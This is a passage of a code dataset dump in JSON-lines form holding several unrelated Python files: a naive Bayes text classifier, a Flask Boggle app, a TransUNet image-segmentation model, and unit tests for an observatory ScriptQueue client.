data['bow'][word]\n for data in training_data:\n if data['label'] == label:\n for word in data['bow']: # Go through each valid bow\n if word in vocab: # Word is either in vocab or part of None\n dict[word] += data['bow'][word]\n else:\n dict[None] += data['bow'][word]\n\n for x in dict:\n word_prob[x] = math.log((dict[x] + smooth) / float(ctr + smooth * (len(vocab) + 1)))\n\n return word_prob\n\n\ndef train(training_directory, cutoff):\n \"\"\" return a dictionary formatted as follows:\n {\n 'vocabulary': ,\n 'log prior': ,\n 'log p(w|y=2016)': ,\n 'log p(w|y=2020)': \n }\n \"\"\"\n retval = {}\n label_list = os.listdir(training_directory)\n vocab = create_vocabulary(training_directory, cutoff)\n data = load_training_data(vocab, training_directory)\n retval['vocabulary'] = vocab\n retval['log prior'] = prior(data, label_list)\n retval['log p(w|y=2016)'] = p_word_given_label(vocab, data, '2016')\n retval['log p(w|y=2020)'] = p_word_given_label(vocab, data, '2020')\n # print(retval)\n return retval\n\n\ndef classify(model, filepath):\n \"\"\" return a dictionary formatted as follows:\n {\n 'predicted y': <'2016' or '2020'>,\n 'log p(y=2016|x)': ,\n 'log p(y=2020|x)': \n }\n \"\"\"\n retval = {}\n sixteen = 0\n twenty = 0\n file = open(filepath, \"r\")\n for line in file:\n holder = line.rstrip()\n if holder in model['vocabulary']:\n sixteen += model['log p(w|y=2016)'][holder]\n twenty += model['log p(w|y=2020)'][holder]\n else:\n sixteen += model['log p(w|y=2016)'][None]\n twenty += model['log p(w|y=2020)'][None]\n prob20 = model['log prior']['2020'] + twenty\n prob16 = model['log prior']['2016'] + sixteen\n retval['log p(y=2020|x)'] = prob20\n retval['log p(y=2016|x)'] = prob16\n if prob20 > prob16:\n retval['predicted y'] = '2020'\n else:\n retval['predicted y'] = '2016'\n return retval\n\n\n# train('./corpus/test/', 2)\n# vocab = create_vocabulary('./corpus/training/', 2)\n# training_data = load_training_data(vocab,'./corpus/training/')\n# print(prior(training_data, ['2020', '2016']))\n\n# model = 
train('./corpus/training/', 2)\n# classify(model, './corpus/test/2016/0.txt')\n\n\n","repo_name":"shaurya-k/classify","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":5411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"16076095402","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n# @File : BasicMLPs.py\r\n# @Date : 2020-09-16\r\n# @Author : mingjian\r\n    Description\r\n\"\"\"\r\n\r\nimport torch.nn as nn\r\n\r\nclass BasicNets(nn.Module):\r\n    def __init__(self,net_params):\r\n        super().__init__()\r\n        self.node_in_dim = net_params['node_in_dim']\r\n        self.device = net_params['device']\r\n        self.dropout = net_params['dropout']\r\n        self.n_layers = net_params['L']\r\n        self.h_dim = net_params['h_dim']\r\n        self.in_feat_dropout = nn.Dropout(net_params['in_feat_dropout'])\r\n\r\n    def loss(self, scores, targets):\r\n        # loss = nn.MSELoss()(scores,targets)\r\n        loss = nn.L1Loss()(scores, targets)\r\n        return loss","repo_name":"netlearningteam/SPN-Benchmark-DS","sub_path":"GNNs/nets/BasicMLPs.py","file_name":"BasicMLPs.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"70268199561","text":"\"\"\" Script that computes the area of the circle\n    Example of a documented function\n    Python for ABM - Ipea - March 2019\n    \"\"\"\n\nimport math\n\n\ndef area_circle(r):\n    \"\"\" Function that computes the area of the circle.\n        Parameter: r - the circle's radius\n        Returns the area\n    \"\"\"\n\n    # Area formula\n    area = math.pi * r ** 2\n    return area\n\n\n\"\"\" Running the module individually.\n    When imported, the code below does not run\n    \"\"\"\nif __name__ == '__main__':\n    raio = 2\n    result = area_circle(raio)\n    # Example of formatting float output to two decimal places using format\n    print('The area is: {:.2f}'.format(result))\n","repo_name":"BAFurtado/Python4ABMIpea2019","sub_path":"function5_comentada.py","file_name":"function5_comentada.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"13601158123","text":"from flask import Flask, render_template, redirect, session, request, jsonify\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom boggle import Boggle\n\nboggle_game = Boggle()\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = \"do*not*tell\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ndebug = DebugToolbarExtension(app)\n\n@app.route('/')\ndef render_index():\n    return render_template('welcome.html')\n\ndef check_for_board():\n    \"\"\" Check session storage to see if there is a currently valid board.\n    If not, initialize session storage. \"\"\"\n    if not session.get('board'):\n        boggle_game = Boggle()\n        session['board'] = boggle_game.make_board()\n        session['games_played'] = 0\n        session['high_score'] = 0\n\n@app.route('/play')\ndef render_gameboard():\n    \"\"\" Looks for a current game, makes a new one if needed, and then renders the gameplay template. 
\"\"\"\n check_for_board()\n return render_template('gameplay.html', board = session['board'], games_played = session['games_played'], high_score = session['high_score'])\n\n@app.route('/make-guess')\ndef return_guess():\n \"\"\" Checks word submission for validity.\"\"\"\n response = boggle_game.check_valid_word(session['board'], request.args['guess'])\n return jsonify(response)\n\n@app.route('/end-game', methods=['POST'])\ndef get_endgame_score():\n \"\"\" Updates session data and redirects to start a new game. \"\"\"\n session['games_played'] += 1\n new_score = int(request.form.get('score'))\n high_score = int(session['high_score'])\n if new_score > high_score:\n session['high_score'] = new_score\n return redirect('/new-game')\n\n@app.route('/new-game')\ndef show_endgame():\n \"\"\" Sets up a new game with a new board. \"\"\"\n boggle_game.set_up_game()\n session['board'] = boggle_game.make_board()\n return render_template('gameplay.html', board = session['board'], games_played = session['games_played'], high_score = session['high_score'])","repo_name":"reverie121/flask-boggle","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41650834534","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\nimport os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n# import ../db.py\nfrom tag.tag import Stage\nfrom .unet_parts import *\nfrom torch import nn\nimport torch\nfrom .res_net import resnet34, resnet18, resnet50, resnet101, resnet152, BasicBlock, Bottleneck, ResNet\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom einops import rearrange, repeat\nfrom einops.layers.torch import Rearrange\nimport math\n\n\nclass SaveFeatures():\n features = None\n\n # def __init__(self, m): self.hook = m.register_forward_hook(self.hook_fn)\n\n # def hook_fn(self, module, input, output): self.features = output\n\n # def remove(self): self.hook.remove()\n\n def __init__(self,m):\n self._outputs_lists = {}\n self.mymodule = m\n m.register_forward_hook(hook=self.save_output_hook)\n\n def save_output_hook(self, _, input, output):\n self._outputs_lists[input[0].device.index] = output\n self.features = self._outputs_lists\n\n def forward(self, x) -> list:\n self._outputs_lists[x.device.index] = []\n self.mymodule(x)\n return self._outputs_lists[x.device.index]\n\n\nclass UnetStageBlock(nn.Module):\n def __init__(self, stage, up_in, x_in, n_out, ratio):\n super().__init__()\n # super(UnetBlock, self).__init__()\n up_out = x_out = n_out // 2\n self.x_conv = nn.Conv2d(x_in, x_out, 1)\n self.g_fc = nn.Linear(7,x_out * 2)\n self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)\n self.stage = stage\n\n self.bn = nn.BatchNorm2d(n_out)\n\n self.pointwise = nn.Conv2d(14, n_out, kernel_size=1)\n self.depthwise = nn.Conv2d(n_out, n_out, kernel_size=3, stride=ratio , padding=1, groups=up_out) \n\n def forward(self, up_p, x_p, give):\n up_p = self.tr_conv(up_p)\n x_p = self.x_conv(x_p)\n cat_p = torch.cat([up_p, x_p], dim=1)\n res = self.bn(F.relu(cat_p))\n # g_p = self.g_fc(give).unsqueeze(-1).unsqueeze(-1) * res\n g_p = self.depthwise(self.pointwise(give))\n res = self.stage(g_p,res)\n return res\n\nclass UnetBlock(nn.Module):\n def __init__(self, up_in, x_in, n_out):\n super().__init__()\n # super(UnetBlock, self).__init__()\n up_out = x_out = n_out // 2\n self.x_conv = nn.Conv2d(x_in, x_out, 
1)\n self.tr_conv = nn.ConvTranspose2d(up_in, up_out, 2, stride=2)\n\n self.bn = nn.BatchNorm2d(n_out)\n\n def forward(self, up_p, x_p):\n up_p = self.tr_conv(up_p)\n x_p = self.x_conv(x_p)\n cat_p = torch.cat([up_p, x_p], dim=1)\n res = self.bn(F.relu(cat_p))\n return res\n\nclass TransUNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False,\n in_chans=3,\n inplanes=64,\n num_layers=(3, 4, 6, 3),\n num_chs=(256, 512, 1024, 2048),\n num_strides=(1, 2, 2, 2),\n num_heads=(1, 2, 4, 8),\n num_parts=(1, 1, 1, 1),\n patch_sizes=(7, 7, 7, 8),\n drop_path=0.1,\n num_enc_heads=(1, 1, 1, 1),\n act=nn.GELU,\n ffn_exp=3,\n has_last_encoder=False\n ):\n super().__init__()\n # super(ResUnet, self).__init__()\n\n ''' ~~~~~ For the embedding transformer~~~~~'''\n cut, lr_cut = [8, 6]\n\n dim = args.dim #dim of transformer sequence, D of E\n\n self.mlp_head = nn.Sequential(\n nn.LayerNorm(dim),\n nn.Linear(dim, dim)\n )\n '''~~~~~~End of embedding transformer~~~~~'''\n\n 'unet and goinnet parameters'\n if resnet == 'resnet34':\n base_model = resnet34\n elif resnet == 'resnet18':\n base_model = resnet18\n elif resnet == 'resnet50':\n base_model = resnet50\n elif resnet == 'resnet101':\n base_model = resnet101\n elif resnet == 'resnet152':\n base_model = resnet152\n else:\n raise Exception('The Resnet Model only accepts resnet18, resnet34, resnet50,'\n 'resnet101 and resnet152')\n \n '''define the stage for goinnet giving'''\n last_chs = (256,256,256,256)\n num_chs = (256, 256, 256, 256)\n down_samples = (2,4,8,16)\n n_l = 1\n stage_list = []\n for i in range(4):\n stage_list.append(\n Stage(last_chs[i],\n num_chs[i],\n n_l,\n num_heads=num_heads[i], #1,2,4,8\n num_parts = (patch_sizes[i]**2 * (args.image_size // down_samples[i] // patch_sizes[i])**2),\n patch_size=patch_sizes[i], #8,8,8,8\n drop_path=drop_path, #0.05\n ffn_exp=ffn_exp, #mlp hidden fea\n last_enc=has_last_encoder and i == len(num_layers) - 1)\n )\n self.stages = nn.ModuleList(stage_list) \n '''end'''\n\n layers = list(base_model(pretrained=pretrained).children())[:cut]\n self.check_layer = layers\n base_layers = nn.Sequential(*layers)\n self.rn = base_layers\n\n\n self.num_classes = num_classes\n self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]\n self.up1 = UnetStageBlock(self.stages[3], 512, 256, 256,16)\n self.up2 = UnetStageBlock(self.stages[2], 256, 128, 256,8)\n self.up3 = UnetStageBlock(self.stages[1], 256, 64, 256,4)\n self.up4 = UnetStageBlock(self.stages[0], 256, 64, 256,2)\n\n self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.munet = MUNet(args)\n\n if args.sim_gpu:\n self.sim_gpu = args.sim_gpu\n self.gpu_device = args.gpu_device\n else:\n # self.munet was already constructed above; avoid building a second MUNet here\n self.sim_gpu = 0\n '''~~~ self definition ~~~'''\n self.fc = nn.Linear(7,dim)\n self.tr_conv = nn.ConvTranspose2d(512, 512, 2, stride=2)\n\n def forward(self, x, cond, mod = 'train'):\n aux = {}\n mergf = []\n img = x\n # x = torch.cat((x,heatmap),1)\n x = F.relu(self.rn(x)) # x = [b_size, 2048, 8, 8]\n emb = x\n\n if mod == 'shuffle':\n self.up1.eval()\n self.up2.eval()\n self.up3.eval()\n self.up4.eval()\n self.up5.eval()\n\n '''~~~ 0: agg ~~~'''\n x = self.up1(x, self.sfs[3].features[x.device.index], cond)\n mergf.append(x)\n x = self.up2(x, self.sfs[2].features[x.device.index], cond)\n mergf.append(x)\n x = self.up3(x, self.sfs[1].features[x.device.index], cond)\n mergf.append(x)\n x = self.up4(x, self.sfs[0].features[x.device.index], cond)\n fea = x\n output = self.up5(x)\n 
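# Added note: up1-up4 fuse the upsampled decoder path with the encoder skip\n # features captured by the SaveFeatures hooks, each block conditioned on `cond`\n # (the stacked 7 two-channel part maps, shape (B, 14, H, W)); up5 then projects\n # the fused 256-channel map to num_classes logits.\n 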
'''end'''\n\n if mod == 'shuffle':\n aux['mergfs'] = mergf\n return output, aux\n\n if self.sim_gpu:\n self.munet = self.munet.to('cuda:' + str(self.sim_gpu))\n ave, mapsin = self.munet(img.to('cuda:' + str(self.sim_gpu)), output.detach().to('cuda:' + str(self.sim_gpu)))\n ave = ave.to('cuda:' + str(self.gpu_device))\n mapsin = mapsin.to('cuda:' + str(self.gpu_device))\n maps = [mapsin[:,i,:,:] for i in range(7)]\n else:\n ave, mapsin = self.munet(img, output.detach())\n maps = [mapsin[:,i,:,:] for i in range(7)]\n\n '''~~~ 0: ENDs ~~~'''\n\n pred_stack = torch.stack(maps) #7,b,c,w,w\n pred_stack_t = F.sigmoid(pred_stack)\n\n self_pred = pred_stack_t * torch.div(pred_stack_t, torch.sum(pred_stack_t, dim = 0, keepdim=True)) #7,b,c,w,w\n self_pred = rearrange(self_pred, \"a b c h w -> b (a c) h w\").contiguous() #b,7c,w,w\n cond = self_pred\n # maps = [nn.Upsample(scale_factor=2, mode='bilinear')(a) for a in maps]\n aux['maps'] = maps\n aux['cond'] = cond\n aux['mergfs'] = mergf\n aux['emb'] = emb\n return output, aux\n\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\nclass MUNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False):\n super().__init__()\n # super(ResUnet, self).__init__()\n drop_path=0.05\n patch_sizes = (8,8,8,8)\n num_heads = (4,4,4,7)\n last_chs = (5,16,16,16)\n num_chs = (16, 16, 16, 14)\n down_samples = (4,4,4,4)\n n_l = 1\n stage_list = []\n for i in range(4):\n stage_list.append(\n Stage(last_chs[i],\n num_chs[i],\n n_l,\n num_heads=num_heads[i], \n num_parts = (patch_sizes[i]**2 * (args.image_size // down_samples[i] // patch_sizes[i])**2),\n patch_size=patch_sizes[i], \n drop_path=drop_path, \n ffn_exp=0.5, \n last_enc=0)\n )\n self.stages = nn.ModuleList(stage_list)\n self.downsample = nn.AvgPool2d(kernel_size=3, stride=4, padding=1)\n self.upsample = nn.Upsample(scale_factor=4, mode='bilinear')\n self.args = args\n\n def forward(self, x, heatmap):\n outlist = []\n x = torch.cat((x,heatmap),1)\n x = self.downsample(x)\n x = self.stages[0](x,x)\n # x = self.downsample(x)\n x = x.to('cuda:' + str(self.args.sim_gpu+2))\n stage1 = self.stages[1].to('cuda:' + str(self.args.sim_gpu+2))\n stage2 = self.stages[2].to('cuda:' + str(self.args.sim_gpu+2)) # bug fix: was self.stages[1] twice (see the commented-out calls below)\n x = stage1(x,x)\n x = stage2(x,x)\n x = x.to('cuda:' + str(self.args.gpu_device))\n # x = self.stages[1](x,x)\n # x = self.stages[2](x,x)\n # x = self.upsample(x)\n if self.args.sim_gpu:\n x = x.to('cuda:' + str(self.args.sim_gpu+1))\n last_stage = self.stages[3].to('cuda:' + str(self.args.sim_gpu+1))\n x = last_stage(x,x)\n x = x.to('cuda:' + str(self.args.gpu_device))\n # x = self.stages[3](x,x)\n x = self.upsample(x)\n x = rearrange(x, \"b (g c) h w -> b g c h w\", g = 7)\n outlist = [x[:,i,:,:] for i in range(7)]\n # outlist.append(x.item()[:,i,:,:] for i in range(7))\n\n\n return sum(outlist)/ 7, x\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\nclass UNet(nn.Module):\n\n def __init__(self, args, resnet='resnet34', num_classes=2, pretrained=False):\n super().__init__()\n # super(ResUnet, self).__init__()\n\n ''' ~~~~~ For the embedding transformer~~~~~'''\n cut, lr_cut = [8, 6]\n\n 'unet and goinnet parameters'\n if resnet == 'resnet34':\n base_model = resnet34\n elif resnet == 'resnet18':\n base_model = resnet18\n elif resnet == 'resnet50':\n base_model = resnet50\n elif resnet == 'resnet101':\n base_model = resnet101\n elif resnet == 'resnet152':\n base_model = resnet152\n else:\n raise Exception('The Resnet Model only accepts resnet18, resnet34, resnet50,'\n 
'resnet101 and resnet152')\n\n layers = list(base_model(pretrained=pretrained,inplanes = 3).children())[:cut]\n self.check_layer = layers\n base_layers = nn.Sequential(*layers)\n self.rn = base_layers\n\n\n self.num_classes = num_classes\n self.sfs = [SaveFeatures(base_layers[i]) for i in [2, 4, 5, 6]]\n self.up1 = UnetBlock(512, 256, 256)\n self.up2 = UnetBlock(256, 128, 256)\n self.up3 = UnetBlock(256, 64, 256)\n self.up4 = UnetBlock(256, 64, 256)\n\n self.up5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n\n self.pred1 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred2 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred3 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred4 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred5 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred6 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n self.pred7 = nn.ConvTranspose2d(256, self.num_classes, 2, stride=2)\n\n def forward(self, x):\n x = F.relu(self.rn(x)) # x = [b_size, 2048, 8, 8]\n\n\n '''~~~ 0: Decoder ~~~'''\n x = self.up1(x, self.sfs[3].features[x.device.index])\n x = self.up2(x, self.sfs[2].features[x.device.index])\n x = self.up3(x, self.sfs[1].features[x.device.index])\n x = self.up4(x, self.sfs[0].features[x.device.index])\n fea = x\n output = self.up5(x)\n '''~~~ 0: ENDs ~~~'''\n '''\n if self.num_classes==1:\n output = x_out[:, 0]\n else:\n output = x_out[:, :self.num_classes]\n '''\n return output\n\n def close(self):\n for sf in self.sfs: sf.remove()\n\n\n","repo_name":"WuJunde/MrPrism","sub_path":"models/unet/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":13090,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"11378317055","text":"import asyncio\nimport logging\nimport types\nimport typing\nimport unittest\nimport unittest.mock\n\nimport yaml\nfrom lsst.ts import idl, salobj\nfrom lsst.ts.observatory.control import Usages\nfrom lsst.ts.observatory.control.mock import RemoteGroupAsyncMock\nfrom lsst.ts.observatory.control.script_queue import ScriptQueue\n\nHB_TIMEOUT = 5 # Heartbeat timeout (sec)\nMAKE_TIMEOUT = 60 # Timeout for make_script (sec)\n\n\nclass TestScriptQueue(RemoteGroupAsyncMock):\n log: logging.Logger\n script_queue: ScriptQueue\n components_metadata: typing.Dict[str, salobj.IdlMetadata]\n\n @classmethod\n def setUpClass(cls) -> None:\n \"\"\"This classmethod is only called once, when preparing the unit\n test.\n \"\"\"\n\n cls.log = logging.getLogger(__name__)\n\n cls.script_queue = ScriptQueue(\n queue_index=idl.enums.ScriptQueue.SalIndex.MAIN_TEL,\n domain=\"FakeDomain\",\n log=cls.log,\n intended_usage=Usages.DryTest,\n )\n\n # Gather metadata information, needed to validate topic versions\n cls.components_metadata = cls.get_component_metadata(\n cls.script_queue.components\n )\n\n return super().setUpClass()\n\n @property\n def remote_group(self) -> ScriptQueue:\n return self.script_queue\n\n async def setup_types(self) -> None:\n self.available_scripts = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_availableScripts\"]\n .field_info\n )\n self.standard_scripts = [\n \"std_script1,std_script2\",\n \"auxtel/std_script1\",\n \"maintel/std_script1\",\n ]\n self.external_scripts = [\n \"ext_script1,ext_script2\",\n \"auxtel/ext_script1\",\n \"maintel/ext_script1\",\n ]\n\n self.available_scripts.standard = 
ScriptQueue.script_separator.join(\n self.standard_scripts\n )\n self.available_scripts.external = ScriptQueue.script_separator.join(\n self.external_scripts\n )\n\n self.config_schema = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_configSchema\"]\n .field_info\n )\n self.config_schema.isStandard = True\n self.config_schema.path = \"std_script1\"\n\n self.config_schema.configSchema = \"\"\"\n$schema: http://json-schema.org/draft-07/schema#\n$id: https://github.com/lsst-ts/ts_standardscripts/base_slew.yaml\ntitle: BaseTrackTarget v1\ndescription: Configuration for BaseTrackTarget.\ntype: object\nproperties:\n ra:\n description: ICRS right ascension (hour).\n type: number\n minimum: 0\n maximum: 24\n dec:\n description: ICRS declination (deg).\n type: number\n minimum: -90\n maximum: 90\n name:\n description: Target name\n type: string\nrequired:\n - ra\n - dec\n - name\nadditionalProperties: false\n \"\"\"\n\n self.logevent_queue = types.SimpleNamespace(\n **self.components_metadata[\"ScriptQueue:1\"]\n .topic_info[\"logevent_queue\"]\n .field_info\n )\n self.logevent_queue.enabled = True\n self.logevent_queue.running = True\n\n async def setup_mocks(self) -> None:\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n self.script_queue.rem.scriptqueue_1.evt_configSchema.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.attach_mock(\n unittest.mock.Mock(),\n \"flush\",\n )\n\n self.script_queue.rem.scriptqueue_1.configure_mock(\n **{\n \"evt_availableScripts.next.return_value\": self.available_scripts,\n \"evt_configSchema.next.return_value\": self.config_schema,\n \"cmd_pause.start.side_effect\": self.script_queue_cmd_pause,\n \"cmd_pause.set_start.side_effect\": self.script_queue_cmd_pause,\n \"cmd_resume.start.side_effect\": self.script_queue_cmd_resume,\n \"cmd_resume.set_start.side_effect\": self.script_queue_cmd_resume,\n \"evt_queue.next.side_effect\": self.get_logevent_queue,\n \"evt_queue.aget.side_effect\": self.get_logevent_queue,\n }\n )\n\n async def test_list_standard_scripts(self) -> None:\n standard_scripts = await self.script_queue.list_standard_scripts()\n\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.fast_timeout,\n )\n self.script_queue.rem.scriptqueue_1.cmd_showAvailableScripts.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout,\n )\n assert standard_scripts == self.standard_scripts\n\n async def test_list_external_scripts(self) -> None:\n external_scripts = await self.script_queue.list_external_scripts()\n\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.evt_availableScripts.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.fast_timeout,\n )\n self.script_queue.rem.scriptqueue_1.cmd_showAvailableScripts.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout,\n )\n\n assert external_scripts == self.external_scripts\n\n async def test_get_script_schema(self) -> None:\n schema = await self.script_queue.get_script_schema(\n is_standard=True,\n script=\"std_script1\",\n )\n\n self.assert_get_script_schema_calls()\n assert schema == self.config_schema.configSchema\n\n async def test_validate_config_good(self) -> None:\n config = 
dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.validate_config(\n is_standard=True,\n script=\"std_script1\",\n config=config,\n )\n\n self.assert_get_script_schema_calls()\n\n async def test_validate_config_err(self) -> None:\n config = dict(ra=10, dec=-30)\n\n with self.assertRaisesRegex(\n RuntimeError, expected_regex=\"'name' is a required property\"\n ):\n await self.script_queue.validate_config(\n is_standard=True,\n script=\"std_script1\",\n config=config,\n )\n\n self.assert_get_script_schema_calls()\n\n async def test_add(self) -> None:\n is_standard = True\n script = \"std_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add(\n is_standard=is_standard,\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=is_standard,\n script=script,\n config=config,\n )\n\n async def test_add_standard(self) -> None:\n script = \"std_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add_standard(\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=True,\n script=script,\n config=config,\n )\n\n async def test_add_external(self) -> None:\n script = \"ext_script1\"\n config = dict(ra=10, dec=-30, name=\"target\")\n\n await self.script_queue.add_external(\n script=script,\n config=config,\n )\n\n self.assert_add(\n is_standard=False,\n script=script,\n config=config,\n )\n\n async def test_get_queue(self) -> None:\n queue = await self.script_queue.get_queue()\n\n assert queue == self.logevent_queue\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n\n async def test_wait_queue_paused_when_queue_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.wait_queue_paused()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_wait_queue_paused_when_queue_running(self) -> None:\n self.logevent_queue.running = True\n\n self.script_queue.long_timeout = 5.0\n\n with self.assertRaisesRegex(\n RuntimeError,\n expected_regex=f\"No queue event received in the last {self.script_queue.long_timeout}s.\",\n ):\n await self.script_queue.wait_queue_paused()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n async def test_wait_queue_running_when_queue_paused(self) -> None:\n self.logevent_queue.running = False\n\n self.script_queue.long_timeout = 5.0\n\n with self.assertRaisesRegex(\n RuntimeError,\n expected_regex=f\"No queue event received in the last {self.script_queue.long_timeout}s.\",\n ):\n await self.script_queue.wait_queue_running()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n async def test_wait_queue_running_when_queue_running(self) -> None:\n self.logevent_queue.running = True\n\n await 
self.script_queue.wait_queue_running()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_pause_when_running(self) -> None:\n self.logevent_queue.running = True\n\n await self.script_queue.pause()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n self.script_queue.rem.scriptqueue_1.cmd_pause.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False, timeout=self.script_queue.long_timeout\n )\n\n async def test_pause_when_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.pause()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_not_called()\n self.script_queue.rem.scriptqueue_1.cmd_pause.start.assert_not_awaited()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_resume_when_running(self) -> None:\n self.logevent_queue.running = True\n\n await self.script_queue.resume()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_not_called()\n self.script_queue.rem.scriptqueue_1.cmd_resume.start.assert_not_awaited()\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_not_awaited()\n\n async def test_resume_when_paused(self) -> None:\n self.logevent_queue.running = False\n\n await self.script_queue.resume()\n\n self.script_queue.rem.scriptqueue_1.evt_queue.aget.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.flush.assert_called()\n\n self.script_queue.rem.scriptqueue_1.cmd_resume.start.assert_awaited_with(\n timeout=self.script_queue.fast_timeout\n )\n self.script_queue.rem.scriptqueue_1.evt_queue.next.assert_awaited_with(\n flush=False, timeout=self.script_queue.long_timeout\n )\n\n assert self.logevent_queue.running\n\n def assert_get_script_schema_calls(self) -> None:\n self.script_queue.rem.scriptqueue_1.evt_configSchema.flush.assert_called_once()\n self.script_queue.rem.scriptqueue_1.cmd_showSchema.set_start.assert_awaited_with(\n isStandard=True,\n path=\"std_script1\",\n timeout=self.script_queue.long_timeout,\n )\n self.script_queue.rem.scriptqueue_1.evt_configSchema.next.assert_awaited_with(\n flush=False,\n timeout=self.script_queue.long_timeout,\n )\n\n def assert_add(\n self,\n is_standard: bool,\n script: str,\n config: typing.Dict[str, typing.Any],\n description: str = \"\",\n log_level: int = logging.DEBUG,\n pause_checkpoint: str = \"\",\n ) -> None:\n self.script_queue.rem.scriptqueue_1.cmd_add.set_start.assert_awaited_with(\n isStandard=is_standard,\n path=script,\n config=yaml.safe_dump(config),\n descr=description,\n location=idl.enums.ScriptQueue.Location.LAST,\n logLevel=log_level,\n pauseCheckpoint=pause_checkpoint,\n timeout=self.script_queue.long_timeout,\n )\n\n async def script_queue_cmd_pause(\n self, *args: typing.Any, **kwargs: typing.Any\n ) 